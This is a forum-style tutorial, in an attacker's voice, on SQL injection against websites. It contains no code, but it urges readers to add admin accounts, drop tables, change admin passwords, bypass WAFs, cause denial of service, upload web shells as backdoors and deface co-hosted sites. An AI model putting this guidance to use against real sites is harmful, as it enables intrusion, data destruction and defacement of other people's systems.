SQL injection
Today I'll write an tutorial for you what covers most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack.
What is the cause of most problems related to SQL injection?
Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
If you're interested about WAF's and how they're working then I suggest to read it from wikipedia http://en.wikipedia.org/wiki/Application_firewall
Is it possible to modify the information in the database by SQL injection?
Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?
Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator?
You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.
How to find admin page of site?
Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.
Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count.
